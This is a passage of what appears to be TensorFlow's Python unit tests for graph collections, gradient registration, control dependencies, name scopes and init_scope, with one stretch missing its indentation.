      self.assertEqual("foo" + s + "/FloatOutput", t.result[0].name)
      self.assertEqual("foo" + s + "/FloatOutput_1", t.result[1].name)
class ObjectWithName(object):
  """Minimal stand-in for collection items: exposes a read-only `name`."""

  def __init__(self, name):
    # Stash the name privately; it is exposed via the property below.
    self._stored_name = name

  @property
  def name(self):
    """The name this object was constructed with."""
    return self._stored_name
class CollectionTest(test_util.TensorFlowTestCase):
  """Tests for per-graph collections and the module-level collection API."""

  def test_get_collections(self):
    """`collections` lists each key once; keys can be enumerated."""
    g = ops.Graph()
    self.assertSequenceEqual(g.collections, [])
    g.add_to_collection("key", 12)
    g.add_to_collection("key", 15)
    self.assertSequenceEqual(g.collections, ["key"])
    g.add_to_collection("other", "foo")
    self.assertSequenceEqual(sorted(g.collections), ["key", "other"])
    self.assertSequenceEqual(
        sorted(g.get_all_collection_keys()), ["key", "other"])

  def test_add_to_collection(self):
    """get_collection returns a copy (optionally name-filtered by regex);
    get_collection_ref aliases the underlying mutable list."""
    g = ops.Graph()
    g.add_to_collection("key", 12)
    g.add_to_collection("other", "foo")
    g.add_to_collection("key", 34)
    # Note that only blank1 is returned.
    g.add_to_collection("blah", 27)
    blank1 = ObjectWithName("prefix/foo")
    g.add_to_collection("blah", blank1)
    blank2 = ObjectWithName("junk/foo")
    g.add_to_collection("blah", blank2)
    self.assertEqual([12, 34], g.get_collection("key"))
    self.assertEqual([], g.get_collection("nothing"))
    self.assertEqual([27, blank1, blank2], g.get_collection("blah"))
    # The scope argument filters items by matching their .name attribute.
    self.assertEqual([blank1], g.get_collection("blah", "prefix"))
    self.assertEqual([blank1], g.get_collection("blah", ".*x"))
    # Make sure that get_collection() returns a first-level
    # copy of the collection, while get_collection_ref() returns
    # the original list.
    other_collection_snapshot = g.get_collection("other")
    other_collection_ref = g.get_collection_ref("other")
    self.assertEqual(["foo"], other_collection_snapshot)
    self.assertEqual(["foo"], other_collection_ref)
    g.add_to_collection("other", "bar")
    self.assertEqual(["foo"], other_collection_snapshot)
    self.assertEqual(["foo", "bar"], other_collection_ref)
    self.assertEqual(["foo", "bar"], g.get_collection("other"))
    self.assertTrue(other_collection_ref is g.get_collection_ref("other"))
    # Verify that getting an empty collection ref returns a modifiable list.
    empty_coll_ref = g.get_collection_ref("empty")
    self.assertEqual([], empty_coll_ref)
    empty_coll = g.get_collection("empty")
    self.assertEqual([], empty_coll)
    self.assertFalse(empty_coll is empty_coll_ref)
    empty_coll_ref2 = g.get_collection_ref("empty")
    self.assertTrue(empty_coll_ref2 is empty_coll_ref)
    # Add to the collection.
    empty_coll_ref.append("something")
    self.assertEqual(["something"], empty_coll_ref)
    self.assertEqual(["something"], empty_coll_ref2)
    self.assertEqual([], empty_coll)
    self.assertEqual(["something"], g.get_collection("empty"))
    empty_coll_ref3 = g.get_collection_ref("empty")
    self.assertTrue(empty_coll_ref3 is empty_coll_ref)

  def test_add_to_collections_uniquify(self):
    """Duplicate names passed to add_to_collections add the value once."""
    g = ops.Graph()
    g.add_to_collections([1, 2, 1], "key")
    # Make sure "key" is not added twice
    self.assertEqual(["key"], g.get_collection(1))

  def test_add_to_collections_from_list(self):
    """Collection names may be given as a list."""
    g = ops.Graph()
    g.add_to_collections(["abc", "123"], "key")
    self.assertEqual(["key"], g.get_collection("abc"))
    self.assertEqual(["key"], g.get_collection("123"))

  def test_add_to_collections_from_tuple(self):
    """Collection names may be given as a tuple."""
    g = ops.Graph()
    g.add_to_collections(("abc", "123"), "key")
    self.assertEqual(["key"], g.get_collection("abc"))
    self.assertEqual(["key"], g.get_collection("123"))

  def test_add_to_collections_from_generator(self):
    """Collection names may be given as a generator."""
    g = ops.Graph()
    def generator():
      yield "abc"
      yield "123"
    g.add_to_collections(generator(), "key")
    self.assertEqual(["key"], g.get_collection("abc"))
    self.assertEqual(["key"], g.get_collection("123"))

  def test_add_to_collections_from_set(self):
    """Collection names may be given as a set."""
    g = ops.Graph()
    g.add_to_collections(set(["abc", "123"]), "key")
    self.assertEqual(["key"], g.get_collection("abc"))
    self.assertEqual(["key"], g.get_collection("123"))

  def test_add_to_collections_from_string(self):
    """A single string names one collection (not its characters)."""
    g = ops.Graph()
    g.add_to_collections("abc", "key")
    self.assertEqual(["key"], g.get_collection("abc"))

  def test_default_graph(self):
    """Module-level add_to_collection targets the default graph."""
    with ops.Graph().as_default():
      ops.add_to_collection("key", 90)
      ops.add_to_collection("key", 100)
      # Collections are ordered.
      self.assertEqual([90, 100], ops.get_collection("key"))

  def test_defun(self):
    """Each defun sees its enclosing context's collections and keeps its
    own additions isolated from the outer context."""
    with context.eager_mode():
      @eager_function.defun
      def defun():
        ops.add_to_collection("int", 1)
        ops.add_to_collection("tensor", constant_op.constant(2))
        @eager_function.defun
        def inner_defun():
          self.assertEqual(ops.get_collection("int"), [1])
          three = ops.get_collection("tensor")[0] + ops.get_collection("int")[0]
          ops.add_to_collection("int", 2)
          self.assertEqual(ops.get_collection("int"), [1, 2])
          ops.add_to_collection("foo", "bar")
          self.assertEqual(ops.get_collection("foo"), ["bar"])
          return three
        self.assertEqual(ops.get_collection("int"), [1])
        three = inner_defun()
        # The inner defun's additions did not leak out.
        self.assertEqual(ops.get_collection("int"), [1])
        self.assertEqual(ops.get_collection("foo"), [])
        return three
      three = defun()
      self.assertEqual(three.numpy(), 3)
# Register the test op "FloatOutput" as having no gradient; exercised by the
# gradient-registry tests below.
ops.NotDifferentiable("FloatOutput")
@ops.RegisterGradient("CopyOp")
def _CopyGrad(op, x_grad):  # pylint: disable=invalid-name
  """Identity gradient for CopyOp: pass the incoming gradient through."""
  del op  # unused by the gradient computation
  return x_grad
@ops.RegisterGradient("copy_override")
def _CopyOverrideGrad(op, x_grad):  # pylint: disable=invalid-name
  """Override gradient registered as "copy_override": forwards x_grad."""
  del op  # unused by the gradient computation
  return x_grad
class RegistrationTest(test_util.TensorFlowTestCase):
  """Tests for gradient-function registration and per-graph overrides."""

  @test_util.run_deprecated_v1
  def testRegisterGradients(self):
    """The gradient registered for an op type is found via its op."""
    x = test_ops.float_output()
    y = test_ops.copy_op(x)
    fn = ops.get_gradient_function(y.op)
    self.assertEqual(_CopyGrad, fn)

  def testOverrideGradients(self):
    """gradient_override_map substitutes a differently-registered gradient."""
    g = ops.Graph()
    with g.as_default():
      x = test_ops.float_output()
      with g.gradient_override_map({"CopyOp": "copy_override"}):
        y = test_ops.copy_op(x)
      fn = ops.get_gradient_function(y.op)
      self.assertEqual(_CopyOverrideGrad, fn)

  def testNonExistentOverride(self):
    """Overriding with an unregistered name fails at gradient lookup time."""
    g = ops.Graph()
    with g.as_default():
      x = test_ops.float_output()
      with g.gradient_override_map({"CopyOp": "unknown_override"}):
        y = test_ops.copy_op(x)
      with self.assertRaisesRegex(LookupError, "unknown_override"):
        ops.get_gradient_function(y.op)
class ComparisonTest(test_util.TensorFlowTestCase):
  """Checks that tensors support Python membership (`in`) tests."""

  def testMembershipAllowed(self):
    """A Tensor may appear in `in` / `not in` expressions against lists."""
    graph = ops.Graph()
    tensor_a = _apply_op(
        graph, "FloatOutput", [], [dtypes.float32], name="myop1")
    tensor_b = _apply_op(
        graph, "FloatOutput", [], [dtypes.float32], name="myop2")
    for tensor in (tensor_a, tensor_b):
      self.assertTrue(isinstance(tensor, ops.Tensor))
    self.assertTrue(tensor_a in [tensor_a])
    self.assertTrue(tensor_a not in [tensor_b])
class ControlDependenciesTest(test_util.TensorFlowTestCase):
  """Tests for `Graph.control_dependencies`: accumulation across nested
  scopes, clearing with None, and omission of deps implied by data edges."""

  @test_util.run_deprecated_v1
  def testBasic(self):
    """Ops inside the scope get the control input; data-dominated ops don't."""
    g = ops.Graph()
    with g.as_default():
      # Creating unregistered ops with _apply_op() doesn't work with the C API
      # TODO(skyewm): address this more consistently. Possible solutions are
      # to use registered ops in all tests, create a way to register ops in
      # Python tests, or conditionally disable the op registration check in
      # the C API.
      a = constant_op.constant(1.0)
      b = constant_op.constant(1.0)
      with g.control_dependencies([a]):
        c = constant_op.constant(1.0)
        d = array_ops.identity(b)
        e = array_ops.identity(c)
    self.assertEqual(c.op.control_inputs, [a.op])
    self.assertEqual(d.op.control_inputs, [a.op])
    # e should be dominated by c.
    self.assertEqual(e.op.control_inputs, [])

  @test_util.run_in_graph_and_eager_modes
  def testEager(self):
    """In eager mode a callable dependency is invoked exactly once."""
    def future():
      future.calls += 1
      return constant_op.constant(2.0)
    future.calls = 0
    if context.executing_eagerly():
      a = constant_op.constant(1.0)
      b = future
      with ops.control_dependencies([a, b]):
        c = constant_op.constant(3.0)
      self.assertEqual(future.calls, 1)
    else:
      g = ops.Graph()
      with g.as_default():
        a = constant_op.constant(1.0)
        b = future()
        with g.control_dependencies([a, b]):
          c = constant_op.constant(3.0)
      self.assertEqual(c.op.control_inputs, [a.op, b.op])
      self.assertEqual(future.calls, 1)

  def testBasicWithConversion(self):
    """Objects with _as_graph_element() are accepted as dependencies."""
    g = ops.Graph()
    a = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    class ConvertibleObj(object):
      def _as_graph_element(self):
        return a
    with g.control_dependencies([ConvertibleObj()]):
      c = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    self.assertEqual(c.op.control_inputs, [a.op])

  def testNested(self):
    """One scope with four deps equals four nested single-dep scopes."""
    g = ops.Graph()
    a_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    with g.control_dependencies([a_1, a_2, a_3, a_4]):
      b_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    with g.control_dependencies([a_1]):
      with g.control_dependencies([a_2]):
        with g.control_dependencies([a_3]):
          with g.control_dependencies([a_4]):
            b_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    self.assertItemsEqual([a_1.op, a_2.op, a_3.op, a_4.op],
                          b_1.op.control_inputs)
    self.assertItemsEqual(b_1.op.control_inputs, b_2.op.control_inputs)

  def testClear(self):
    """control_dependencies(None) clears the stack; exiting restores it."""
    g = ops.Graph()
    a_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    with g.control_dependencies([a_1]):
      with g.control_dependencies([a_2]):
        with g.control_dependencies(None):
          with g.control_dependencies([a_3]):
            with g.control_dependencies([a_4]):
              # deps [a_3, a_4]
              b_3_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
            # deps = [a_3]
            b_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
          # deps back to None
          b_none = _apply_op(g, "FloatOutput", [], [dtypes.float32])
        # deps back to [a_1, a_2]
        b_1_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
      # deps back to [a_1]
      b_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
      with g.control_dependencies(None):
        # deps are None again
        b_none2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    self.assertItemsEqual([a_3.op, a_4.op], b_3_4.op.control_inputs)
    self.assertItemsEqual([a_3.op], b_3.op.control_inputs)
    self.assertItemsEqual([], b_none.op.control_inputs)
    self.assertItemsEqual([a_1.op, a_2.op], b_1_2.op.control_inputs)
    self.assertItemsEqual([a_1.op], b_1.op.control_inputs)
    self.assertItemsEqual([], b_none2.op.control_inputs)

  def testComplex(self):
    """Nested scopes accumulate control deps, except deps that are already
    carried transitively by an op's data inputs."""
    g = ops.Graph()
    # Usage pattern:
    # * Nodes a_i are constants defined at the outermost scope, and are used
    #   as control inputs for the ith nested scope.
    # * Nodes b_i are defined as Mul(a_3, a_4) at each scope.
    # * Nodes c_i are defined as Mul(a_1, b_1) at each scope.
    # * Nodes d_i are defined as Mul(b_i, c_i) at each scope.
    # * Nodes e_i are defined as Mul(e_i-1, e_i-1) at each scope i > 1.
    a_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    with g.control_dependencies([a_1]):
      b_1 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_3, a_4],
                      [dtypes.float32])
      c_1 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_1, b_1],
                      [dtypes.float32])
      d_1 = _apply_op(g, "TwoFloatInputsFloatOutput", [b_1, c_1],
                      [dtypes.float32])
      e_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
      with g.control_dependencies([a_2]):
        b_2 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_3, a_4],
                        [dtypes.float32])
        c_2 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_1, b_1],
                        [dtypes.float32])
        d_2 = _apply_op(g, "TwoFloatInputsFloatOutput", [b_2, c_2],
                        [dtypes.float32])
        e_2 = _apply_op(g, "TwoFloatInputsFloatOutput", [e_1, e_1],
                        [dtypes.float32])
        with g.control_dependencies([a_3]):
          b_3 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_3, a_4],
                          [dtypes.float32])
          c_3 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_1, b_1],
                          [dtypes.float32])
          d_3 = _apply_op(g, "TwoFloatInputsFloatOutput", [b_3, c_3],
                          [dtypes.float32])
          e_3 = _apply_op(g, "TwoFloatInputsFloatOutput", [e_2, e_2],
                          [dtypes.float32])
          with g.control_dependencies([a_4]):
            b_4 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_3, a_4],
                            [dtypes.float32])
            c_4 = _apply_op(g, "TwoFloatInputsFloatOutput", [a_1, b_1],
                            [dtypes.float32])
            d_4 = _apply_op(g, "TwoFloatInputsFloatOutput", [b_4, c_4],
                            [dtypes.float32])
            e_4 = _apply_op(g, "TwoFloatInputsFloatOutput", [e_3, e_3],
                            [dtypes.float32])
    self.assertItemsEqual([a_1.op], b_1.op.control_inputs)
    self.assertItemsEqual([a_1.op, a_2.op], b_2.op.control_inputs)
    self.assertItemsEqual([a_1.op, a_2.op], b_3.op.control_inputs)
    self.assertItemsEqual([a_1.op, a_2.op], b_4.op.control_inputs)
    self.assertItemsEqual([], c_1.op.control_inputs)
    self.assertItemsEqual([a_2.op], c_2.op.control_inputs)
    self.assertItemsEqual([a_2.op, a_3.op], c_3.op.control_inputs)
    self.assertItemsEqual([a_2.op, a_3.op, a_4.op], c_4.op.control_inputs)
    self.assertItemsEqual([], d_1.op.control_inputs)
    self.assertItemsEqual([], d_2.op.control_inputs)
    self.assertItemsEqual([], d_3.op.control_inputs)
    self.assertItemsEqual([], d_4.op.control_inputs)
    self.assertItemsEqual([a_1.op], e_1.op.control_inputs)
    self.assertItemsEqual([a_2.op], e_2.op.control_inputs)
    self.assertItemsEqual([a_3.op], e_3.op.control_inputs)
    self.assertItemsEqual([a_4.op], e_4.op.control_inputs)

  def testRepeatedDependency(self):
    """Deps on two outputs of one op yield a single control input each."""
    g = ops.Graph()
    a = g.create_op("TwoFloatOutputs", [], [dtypes.float32, dtypes.float32])
    a_0, a_1 = a.outputs
    with g.control_dependencies([a_0]):
      b = _apply_op(g, "FloatOutput", [], [dtypes.float32])
      with g.control_dependencies([a_1]):
        c = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    self.assertEqual(b.op.control_inputs, [a])
    self.assertEqual(c.op.control_inputs, [a])

  def testNoControlDependencyWithDataDependency(self):
    """A control dep is dropped when a data dependency on the same op exists."""
    g = ops.Graph()
    a = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    with g.control_dependencies([a]):
      b = _apply_op(g, "Identity", [a], [dtypes.float32])
    self.assertEqual(b.op.control_inputs, [])
class OpScopeTest(test_util.TensorFlowTestCase):
  @test_util.run_in_graph_and_eager_modes
  def testNames(self):
    """ops.name_scope slash semantics: names ending in "/" are treated as
    absolute/literal scopes; ""/None reset to the root."""
    with ops.name_scope("foo", skip_on_eager=False) as foo:
      self.assertEqual("foo/", foo)
      with ops.name_scope("foo2", skip_on_eager=False) as foo2:
        self.assertEqual("foo/foo2/", foo2)
      with ops.name_scope(None, skip_on_eager=False) as empty1:
        self.assertEqual("", empty1)
        with ops.name_scope("foo3", skip_on_eager=False) as foo3:
          self.assertEqual("foo3/", foo3)
      with ops.name_scope("", skip_on_eager=False) as empty2:
        self.assertEqual("", empty2)
      # A trailing "/" re-enters the existing "foo" scope as-is.
      with ops.name_scope("foo/", skip_on_eager=False) as outer_foo:
        self.assertEqual("foo/", outer_foo)
        with ops.name_scope("", skip_on_eager=False) as empty3:
          self.assertEqual("", empty3)
        with ops.name_scope("foo4", skip_on_eager=False) as foo4:
          self.assertEqual("foo/foo4/", foo4)
        # Double trailing slashes are kept literally.
        with ops.name_scope("foo5//", skip_on_eager=False) as foo5:
          self.assertEqual("foo5//", foo5)
          with ops.name_scope("foo6", skip_on_eager=False) as foo6:
            self.assertEqual("foo5//foo6/", foo6)
        with ops.name_scope("/", skip_on_eager=False) as foo7:
          self.assertEqual("/", foo7)
        with ops.name_scope("//", skip_on_eager=False) as foo8:
          self.assertEqual("//", foo8)
        # Interior double slashes are preserved inside the current scope.
        with ops.name_scope("a//b/c", skip_on_eager=False) as foo9:
          self.assertEqual("foo/a//b/c/", foo9)
      with ops.name_scope("a//b/c", skip_on_eager=False) as foo10:
        self.assertEqual("a//b/c/", foo10)
@test_util.run_in_graph_and_eager_modes
def testEagerDefaultScopeName(self):
with ops.name_scope(None, "default", skip_on_eager=False) as scope:
self.assertEqual(scope, "default/")
with ops.name_scope(None, "default2", skip_on_eager=False) as scope2:
self.assertEqual(scope2, "default/default2/")
@test_util.run_in_graph_and_eager_modes
def testNameScopeV2IsReEntrant(self):
foo = ops.name_scope_v2("foo")
bar = ops.name_scope_v2("bar")
with foo as scope_name:
self.assertEqual("foo/", scope_name)
with foo as scope_name:
self.assertEqual("foo/foo/", scope_name)
with bar as scope_name:
self.assertEqual("foo/bar/", scope_name)
with foo as scope_name:
self.assertEqual("foo/bar/foo/", scope_name)
with bar as scope_name:
self.assertEqual("bar/", scope_name)
@test_util.run_deprecated_v1
def testNoScopeName(self):
g0 = ops.Graph()
values = [
g0.create_op("A", [], [dtypes.float32]),
g0.create_op("B", [], [dtypes.float32])
]
with self.assertRaises(ValueError):
with ops.name_scope(None, values=values):
pass
with self.assertRaises(ValueError):
with ops.name_scope(None, None, values):
pass
@test_util.run_deprecated_v1
def testEmptyScopeName(self):
g0 = ops.Graph()
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
with ops.name_scope("", values=[a, b]) as scope:
self.assertEqual("", scope)
self.assertEqual(g0, ops.get_default_graph())
with ops.name_scope("", "my_default_scope", [a, b]) as scope:
self.assertEqual("", scope)
self.assertEqual(g0, ops.get_default_graph())
@test_util.run_deprecated_v1
def testDefaultScopeName(self):
g0 = ops.Graph()
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
scope_name = "my_scope"
default_scope_name = "my_default_scope"
with ops.name_scope(scope_name, default_scope_name, [a, b]) as scope:
self.assertEqual("%s/" % scope_name, scope)
self.assertEqual(g0, ops.get_default_graph())
with ops.name_scope(None, default_scope_name, [a, b]) as scope:
self.assertEqual("%s/" % default_scope_name, scope)
self.assertEqual(g0, ops.get_default_graph())
with self.assertRaises(TypeError):
with ops.name_scope(scope_name, [a, b]):
pass
def _testGraphElements(self, graph_elements):
scope_name = "my_scope"
with ops.name_scope(scope_name, values=graph_elements) as scope:
self.assertEqual("%s/" % scope_name, scope)
self.assertEqual(graph_elements[0].graph, ops.get_default_graph())
g1 = ops.Graph()
a = g1.create_op("A", [], [dtypes.float32])
with self.assertRaises(ValueError):
with ops.name_scope(scope_name, values=graph_elements + [a]):
pass
@test_util.run_in_graph_and_eager_modes
def testGetCurrentNameScope(self):
self.assertEqual(ops.get_current_name_scope(), "")
with ops.name_scope_v2("aaa"):
self.assertEqual(ops.get_current_name_scope(), "aaa")
with ops.name_scope_v2("bbb"):
self.assertEqual(ops.get_current_name_scope(), "aaa/bbb")
self.assertEqual(ops.get_current_name_scope(), "aaa")
self.assertEqual(ops.get_current_name_scope(), "")
@test_util.run_deprecated_v1
def testTensor(self):
g0 = ops.Graph()
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
self._testGraphElements([a, b])
@test_util.run_deprecated_v1
def testSparseTensor(self):
g0 = ops.Graph()
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
sparse = sparse_tensor.SparseTensor(
_apply_op(g0, "Int64Output", [], [dtypes.int64]),
_apply_op(g0, "FloatOutput", [], [dtypes.float32]),
_apply_op(g0, "Int64Output", [], [dtypes.int64]))
self._testGraphElements([a, sparse, b])
@test_util.run_deprecated_v1
def testVariable(self):
g0 = ops.Graph()
with g0.as_default():
variable = variables.Variable([1.0])
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
self._testGraphElements([a, variable, b])
class InitScopeTest(test_util.TensorFlowTestCase):
  """Tests `ops.init_scope`: clearing deps, lifting ops out of functions."""

  def testClearsControlDependencies(self):
    g = ops.Graph()
    a_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    a_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    with g.as_default():
      with g.control_dependencies([a_1]):
        with g.control_dependencies([a_2]):
          with ops.init_scope():
            with g.control_dependencies([a_3]):
              with g.control_dependencies([a_4]):
                # deps [a_3, a_4]
                b_3_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
              # deps = [a_3]
              b_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
            # deps back to None
            b_none = _apply_op(g, "FloatOutput", [], [dtypes.float32])
          # deps back to [a_1, a_2]
          b_1_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
        # deps back to [a_1]
        b_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
      with ops.init_scope():
        # deps are None again
        b_none2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
    self.assertItemsEqual([a_3.op, a_4.op], b_3_4.op.control_inputs)
    self.assertItemsEqual([a_3.op], b_3.op.control_inputs)
    self.assertItemsEqual([], b_none.op.control_inputs)
    self.assertItemsEqual([a_1.op, a_2.op], b_1_2.op.control_inputs)
    self.assertItemsEqual([a_1.op], b_1.op.control_inputs)
    self.assertItemsEqual([], b_none2.op.control_inputs)

  def testLiftsOpsFromFunctions(self):
    g0 = ops.Graph()
    g1 = ops.Graph()
    g1._building_function = True  # pylint: disable=protected-access
    g2 = ops.Graph()
    g2._building_function = True  # pylint: disable=protected-access
    with g0.as_default():
      with g1.as_default():
        with g2.as_default():
          with ops.init_scope():
            # Lifted past both function graphs into g0.
            _ = constant_op.constant(1.0)
    self.assertLen(g2.get_operations(), 0)
    self.assertLen(g1.get_operations(), 0)
    self.assertLen(g0.get_operations(), 1)

  def testPreservesDevices(self):
    g0 = ops.Graph()
    with g0.as_default(), ops.device("CPU:0"):
      g1 = ops.Graph()
      g1._building_function = True  # pylint: disable=protected-access
      with g1.as_default():
        with ops.device("GPU:0"):
          with ops.init_scope():
            # init_scope should preserve device set under `g1`.
            on_gpu = constant_op.constant(1.0)
            self.assertEqual(on_gpu.device, "/device:GPU:0")
          still_on_gpu = constant_op.constant(1.0)
          self.assertEqual(still_on_gpu.device, "/device:GPU:0")
        blank = constant_op.constant(1.0)
        self.assertEqual(blank.device, "")
        with ops.init_scope():
          now_on_cpu = constant_op.constant(1.0)
          self.assertEqual(now_on_cpu.device, "/device:CPU:0")
      on_cpu = constant_op.constant(1.0)
      self.assertEqual(on_cpu.device, "/device:CPU:0")

  def testComposes(self):
    g0 = ops.Graph()
    g1 = ops.Graph()
    g1._building_function = True  # pylint: disable=protected-access
    g2 = ops.Graph()
    g2._building_function = True  # pylint: disable=protected-access
    g3 = ops.Graph()
    g3._building_function = False  # pylint: disable=protected-access
    with g0.as_default():
      with g1.as_default():
        with ops.init_scope():
          # This op should be lifted into g0.
          _ = constant_op.constant(1.0)
          self.assertIs(g0, ops.get_default_graph())
          self.assertLen(g2.get_operations(), 0)
          self.assertLen(g1.get_operations(), 0)
          self.assertLen(g0.get_operations(), 1)
        with g2.as_default():
          with ops.init_scope():
            # This op should be lifted into g0.
            _ = constant_op.constant(1.0)
            self.assertIs(g0, ops.get_default_graph())
    with g3.as_default():
      with ops.init_scope():
        # This op should be lifted into g3, because g3 is not building a
        # function.
        _ = constant_op.constant(1.0)
        self.assertIs(g3, ops.get_default_graph())
    self.assertLen(g3.get_operations(), 1)
    self.assertLen(g2.get_operations(), 0)
    self.assertLen(g1.get_operations(), 0)
    self.assertLen(g0.get_operations(), 2)

  def testEscapesToEagerContext(self):
    g = ops.Graph()
    g._building_function = True  # pylint: disable=protected-access
    with context.eager_mode():
      with context.graph_mode():
        with g.as_default():
          with ops.init_scope():
            # Because g is building a function, init_scope should
            # escape out to the eager context.
            self.assertTrue(context.executing_eagerly())
          # g should be reinstated as the default graph, and the
          # graph context should be re-entered.
          self.assertIs(g, ops.get_default_graph())
          self.assertFalse(context.executing_eagerly())

  def testStaysInEagerWhenOnlyEagerContextActive(self):
    with context.eager_mode():
      with ops.init_scope():
        self.assertTrue(context.eager_mode())
      self.assertTrue(context.eager_mode())

  def testEscapesDefunWhenInEagerMode(self):

    def function_with_variables():
      with ops.init_scope():
        self.v = resource_variable_ops.ResourceVariable(3)
      return self.v.assign_add(1)

    with context.eager_mode():
      # Each invocation of function_with_variables recreates a variable.
      self.assertEqual(4, int(function_with_variables()))
      self.assertEqual(4, int(function_with_variables()))
      compiled = eager_function.defun(function_with_variables)
      # The init_scope in function_with_variables lifts the variable out
      # of the graph function constructed by defun; hence,
      # compiled now appears to be stateful.
      self.assertEqual(4, int(compiled()))
      self.assertEqual(5, int(compiled()))

  def testEscapesDefunWhenInGraphMode(self):

    def function_with_variables(name):
      with ops.init_scope():
        _ = variable_scope.get_variable(name, shape=(1,))

    g = ops.Graph()
    with g.as_default():
      with self.cached_session():
        # First ensure that graphs that are not building functions are
        # not escaped.
        function_with_variables("foo")
        with self.assertRaisesRegex(ValueError,
                                    r"Variable foo already exists.*"):
          # This will fail because reuse is not set to True.
          function_with_variables("foo")
        compiled = eager_function.defun(function_with_variables)
        compiled("bar")
        self.assertEqual(
            len(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)), 2)
        # The second call to `compiled` should not create variables: the
        # init_scope has lifted the variable creation code out of the defun.
        compiled("bar")
        self.assertEqual(
            len(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)), 2)

  def testEscapesNestedDefun(self):

    def inner_function():
      with ops.init_scope():
        self.v = resource_variable_ops.ResourceVariable(1)
      return self.v.assign_add(2)

    def outer_function(inner=None):
      with ops.init_scope():
        self.v0 = resource_variable_ops.ResourceVariable(0)
      return self.v0.assign_add(1) + inner()

    with context.eager_mode():
      # Each invocation of outer_function recreates variables.
      self.assertEqual(4, int(outer_function(inner=inner_function)))
      self.assertEqual(4, int(outer_function(inner=inner_function)))
      compiled_inner = eager_function.defun(inner_function)
      compiled_outer = eager_function.defun(outer_function)
      # The init_scope lifts variables out of the graph functions
      # constructed by defun; hence, compiled_outer should now appear to be
      # stateful.
      self.assertEqual(4, int(compiled_outer(inner=compiled_inner)))
      self.assertEqual(7, int(compiled_outer(inner=compiled_inner)))

  @test_util.run_v1_only("b/120545219")
  def testFallsBackToGlobalGraphWhenAllGraphsAreBuildingFunctions(self):
    with context.graph_mode():
      ops.reset_default_graph()
      # This doesn't push anything onto the graph stack, but it does
      # set the stack's global graph.
      global_graph = ops.get_default_graph()
      fn_graph = ops.Graph()
      # pylint: disable=protected-access
      fn_graph._building_function = True
      self.assertLen(ops._default_graph_stack.stack, 0)
      with fn_graph.as_default():
        self.assertLen(ops._default_graph_stack.stack, 1)
        with ops.init_scope():
          self.assertGreater(len(ops._default_graph_stack.stack), 1)
          dummy = constant_op.constant(1.0)
        self.assertLen(ops._default_graph_stack.stack, 1)
      # Note that the global graph is _not_ on the graph stack.
      self.assertLen(ops._default_graph_stack.stack, 0)
      # Ensure that `dummy` was added to the global graph.
      self.assertEqual(global_graph, dummy.graph)
      # pylint: enable=protected-access

  def testInstallsDefaultGraphWhenGraphStackIsEmptyInGraphMode(self):
    with context.graph_mode():
      # pylint: disable=protected-access
      self.assertLen(ops._default_graph_stack.stack, 0)
      with ops.init_scope():
        self.assertGreater(len(ops._default_graph_stack.stack), 0)
      self.assertLen(ops._default_graph_stack.stack, 0)
      # pylint: enable=protected-access

  def testPreservesNameScopeInGraphConstruction(self):
    with ops.Graph().as_default():
      function_graph = ops.Graph()
      with function_graph.as_default():
        with ops.name_scope("inner", skip_on_eager=False), ops.init_scope():
          self.assertEqual(ops.get_name_scope(), "inner")
      self.assertEqual(ops.get_name_scope(), "")

  def testEnteringGraphFromEagerIsSticky(self):
    with context.eager_mode():
      g = ops.Graph()
      with g.as_default():
        with ops.init_scope():
          self.assertFalse(context.executing_eagerly())
          self.assertEqual(g, ops.get_default_graph())

  def testMixGraphEager(self):
    with context.eager_mode():
      c = constant_op.constant(1.0)
      with ops.Graph().as_default():
        with self.assertRaisesRegex(RuntimeError,
                                    "Attempting to capture an EagerTensor"):
          math_ops.add(c, c)
